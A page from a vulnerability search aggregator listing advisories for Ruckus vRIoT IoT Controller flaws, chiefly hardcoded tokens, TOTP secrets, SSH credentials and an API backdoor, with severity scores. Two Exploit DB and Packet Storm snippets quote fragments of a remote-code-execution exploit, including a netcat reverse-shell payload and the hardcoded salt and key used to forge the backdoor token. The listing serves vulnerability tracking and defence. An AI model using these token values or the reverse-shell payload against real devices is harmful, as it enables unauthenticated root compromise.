24 matches found

Nuclei
added 4 days ago | 15 views

Ruckus vRioT IoT Controller - Authentication Bypass

Ruckus vRioT through 1.5.1.0.21 contains an API backdoor caused by a hardcoded token in validatetoken.py, letting unauthenticated attackers interact with the API without authentication. id: CVE-2020-26879 info: name: Ruckus vRioT IoT Controller - Authentication Bypass author: DhiyaneshDk severity:...

CVSS 10 | AI score 7.3 | EPSS 0.88897
Exploits 1 | References 6
RedhatCVE
added 2026/01/13 10:52 p.m. | 4 views

CVE-2025-69425

The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 GA expose a command execution service on TCP port 2004 running with root privileges. Authentication to this service relies on a hardcoded Time-based One-Time Password (TOTP) secret and an embedded static token. An attacker who...

CVSS 10 | AI score 8.1 | EPSS 0.00048
Exploits 0 | References 1
NVD
added 2026/01/09 5:15 p.m. | 3 views

CVE-2025-69426

The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 GA contain hardcoded credentials for an operating system user account within an initialization script. The SSH service is network-accessible without IP-based restrictions. Although the configuration disables SCP and pseudo-TTY...

CVSS 10 | EPSS 0.00023
Exploits 0 | References 2
NVD
added 2026/01/09 5:15 p.m. | 2 views

CVE-2025-69425

The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 GA expose a command execution service on TCP port 2004 running with root privileges. Authentication to this service relies on a hardcoded Time-based One-Time Password (TOTP) secret and an embedded static token. An attacker who...

CVSS 10 | EPSS 0.00048
Exploits 0 | References 2
Vulnrichment
added 2026/01/09 4:15 p.m. | 3 views

CVE-2025-69426 Ruckus vRIoT IoT Controller < 3.0.0.0 Hardcoded SSH Credentials RCE

The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 GA contain hardcoded credentials for an operating system user account within an initialization script. The SSH service is network-accessible without IP-based restrictions. Although the configuration disables SCP and pseudo-TTY...

CVSS 10 | AI score 7 | EPSS 0.00023
Exploits 0 | References 2
CVE
added 2026/01/09 4:15 p.m. | 6 views

CVE-2025-69426

The CVE-2025-69426 issue affects Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0. An initialization script contains hardcoded OS user credentials, enabling authentication even though SCP and pseudo-TTY are disabled. The SSH service is network-accessible without IP-based restriction...

CVSS 10 | AI score 7 | EPSS 0.00023
Exploits 0 | References 2
Cvelist
added 2026/01/09 4:15 p.m. | 19 views

CVE-2025-69426 Ruckus vRIoT IoT Controller < 3.0.0.0 Hardcoded SSH Credentials RCE

The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 GA contain hardcoded credentials for an operating system user account within an initialization script. The SSH service is network-accessible without IP-based restrictions. Although the configuration disables SCP and pseudo-TTY...

CVSS 10 | EPSS 0.00023
Exploits 0 | References 2
Vulnrichment
added 2026/01/09 4:14 p.m. | 11 views

CVE-2025-69425 Ruckus vRIoT IoT Controller < 3.0.0.0 Hardcoded Tokens RCE

The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 GA expose a command execution service on TCP port 2004 running with root privileges. Authentication to this service relies on a hardcoded Time-based One-Time Password (TOTP) secret and an embedded static token. An attacker who...

CVSS 10 | AI score 7.7 | EPSS 0.00048
Exploits 0 | References 2
Cvelist
added 2026/01/09 4:14 p.m. | 17 views

CVE-2025-69425 Ruckus vRIoT IoT Controller < 3.0.0.0 Hardcoded Tokens RCE

The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 GA expose a command execution service on TCP port 2004 running with root privileges. Authentication to this service relies on a hardcoded Time-based One-Time Password (TOTP) secret and an embedded static token. An attacker who...

CVSS 10 | EPSS 0.00048
Exploits 0 | References 2
CNNVD
added 2026/01/09 12:0 a.m. | 0 views

Ruckus vRIoT IoT Controller Trust Management Issue Vulnerability

Ruckus vRIoT IoT Controller is a virtual wireless IoT controller from Ruckus USA. A trust management issue vulnerability exists in Ruckus vRIoT IoT Controller versions prior to 3.0.0.0 that stems from hard-coded credentials and could lead to the execution of arbitrary code...

CVSS 10 | AI score 6.9 | EPSS 0.00048
Exploits 0 | References 2
Positive Technologies
added 2026/01/09 12:0 a.m. | 1 view

PT-2026-1952

Name of the Vulnerable Software and Affected Versions: Ruckus vRIoT IoT Controller versions prior to 3.0.0.0 GA. Description: The Ruckus vRIoT IoT Controller firmware exposes a command execution service on TCP port 2004 running with root privileges. Authentication to this service relies on a hardcod...

CVSS 10 | AI score 7.8 | EPSS 0.00048
Exploits 0 | References 6
CNNVD
added 2026/01/09 12:0 a.m. | 2 views

Ruckus vRIoT IoT Controller Trust Management Issue Vulnerability

Ruckus vRIoT IoT Controller is a virtual wireless IoT controller from Ruckus USA. A trust management issue vulnerability exists in Ruckus vRIoT IoT Controller versions prior to 3.0.0.0 that stems from hard-coded credentials and could lead to the execution of arbitrary code...

CVSS 10 | AI score 6.9 | EPSS 0.00023
Exploits 0 | References 2
Positive Technologies
added 2026/01/09 12:0 a.m. | 4 views

PT-2026-1953

Name of the Vulnerable Software and Affected Versions: Ruckus vRIoT IoT Controller versions prior to 3.0.0.0. Description: The Ruckus vRIoT IoT Controller firmware contains hardcoded credentials for an operating system user account within an initialization script. The SSH service is network-accessib...

CVSS 10 | AI score 7.1 | EPSS 0.00023
Exploits 0 | References 6
VulnCheck KEV
added 2022/06/28 12:0 a.m. | 0 views

VulnCheck KEV: CVE-2020-26879

Ruckus vRioT through 1.5.1.0.21 has an API backdoor that is hardcoded into validatetoken.py. An unauthenticated attacker can interact with the service API by using a backdoor value as the Authorization header...

CVSS 10 | AI score 7.3 | EPSS 0.88897
Exploits 1 | References 1
KoreLogic Security
added 2021/05/26 12:0 a.m. | 26 views

CommScope Ruckus IoT Controller Hard-coded API Keys Exposed

Vulnerability Details. Affected Vendor: CommScope; Affected Product: Ruckus IoT Controller; Affected Version: 1.7.1.0 and earlier; Platform: Linux; CWE Classification: CWE-798: Use of Hard-coded Credentials; CVE ID: CVE-2021-33220. 2. Vulnerability Description: API keys for CommScope Ruckus are included...

CVSS 7.8 | AI score 0.4 | EPSS 0.00047
Exploits 2 | Affected Software 1
Packet Storm
added 2020/11/27 12:0 a.m. | 602 views

Ruckus IoT Controller 1.5.1.0.21 Remote Code Execution

Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...

CVSS 9 | AI score 0.1 | EPSS 0.62973
Exploits 3
Exploit DB
added 2020/11/27 12:0 a.m. | 847 views

Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution

Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...

CVSS 9 | AI score 7 | EPSS 0.62973
Exploits 3
CNVD
added 2020/10/27 12:0 a.m. | 1 view

Ruckus Networks Ruckus vRioT Trust Management Issues Vulnerability

Ruckus Networks Ruckus vRioT is a software based on Bluetooth, ZigBee, LoRa to realize endpoint connectivity from Ruckus Networks, USA. A trust management issue vulnerability exists in Ruckus Networks Ruckus vRioT versions prior to 1.5.1.0.21. The vulnerability stems from the fact that Ruckus vRi...

CVSS 10 | AI score 7 | EPSS 0.88897
Exploits 1 | References 1
OSV
added 2020/10/26 8:15 p.m. | 0 views

CVE-2020-26879

Ruckus vRioT through 1.5.1.0.21 has an API backdoor that is hardcoded into validatetoken.py. An unauthenticated attacker can interact with the service API by using a backdoor value as the Authorization header...

CVSS 9.8 | AI score 7.3
Exploits 0 | References 6
NVD
added 2020/10/26 8:15 p.m. | 7 views

CVE-2020-26879

Ruckus vRioT through 1.5.1.0.21 has an API backdoor that is hardcoded into validatetoken.py. An unauthenticated attacker can interact with the service API by using a backdoor value as the Authorization header...

CVSS 10 | EPSS 0.88897
Exploits 1 | References 6